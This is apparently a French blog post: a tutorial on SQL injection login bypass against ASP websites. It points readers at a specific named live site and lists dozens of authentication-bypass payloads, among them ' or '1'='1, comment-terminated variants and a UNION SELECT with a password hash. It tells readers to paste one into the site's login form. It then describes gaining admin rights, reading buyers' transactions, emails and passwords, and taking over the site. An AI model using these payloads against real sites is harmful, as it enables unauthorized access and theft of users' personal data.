La faille SQLi, abréviation de SQL Injection, soit injection SQL en français, est un groupe de méthodes d'exploitation de faille de sécurité d'une application interagissant avec une base de données. Elle permet d'injecter dans la requête SQL en cours un morceau de requête non prévu par le système et pouvant en compromettre la sécurité.Il existe plusieurs types d'injection SQL
Celles que nous allons Effectuer, est une Injection SQL très connue du Monde du Hacking, Il s'agit là de l'injection sur des failles des sites en ASP !
_______________________________________________________________________________
Sans toute fois perdre du temps on va commencer:
On va sur ce site http://reap.com.pk qui est l'un des sites vulnérables. Je pouvais choisir un autre mais celui ci est vulnérable à 200 pour-cent 😂😂😂😂😂 et je vais contacter l'admin pour la sécurité du site.
Alors maintenant on va réessayer avec une petite Injection de txt dans la base de donnée pour passer utilisateur root/Admin du site.
Ligne à coper:
or 1=1
or 1=1—
or 1=1#
or 1=1/*
admin' —
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'—
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1—
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'—
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'—
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" —
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"—
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1—
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"—
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"—
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
copiez une ligne et collez ça dans Reap ID et dans Mot de passe : admin' or '1'='1. Maintenant tapez entrez et automatiquement vous serez connecter au site en tant qu'Admin et avec tout les droits , vous pourrez modifier les mots de passes , voir les autres user et leurs mots de passes etc
la vous etes Admin et vous pouvez consulter les transactions des acheteurs, obtenir leurs mails , leurs mots de passes etccette méthode est très simple
Vous pouvez meme vous approprier le site comme je vous connais, les sorciers peuvent meme changer de serveur mais je vous déconseille ca car je vais recuperer le site
NB: Cette méthode est une des méthodes que je proposerai dans ma formation Complète de SECURITE INFORMATIQUE de stage de VACANCE que j'ai lancé dans la ville de yde✅
Vous l'avez vu vous meme , elle est simple et efficace !
Il existe pleins d'autres méthodes pour Effectuer des Injections SQL , partagez la PAGE FACEBOOK au max et je ferai encore plus de tutos simple et complets biensure 🚩
Quand vous maîtriserez cette simple méthode vous serez capable de la reproduire en 5 Secondes 😁
Aucun commentaire:
Enregistrer un commentaire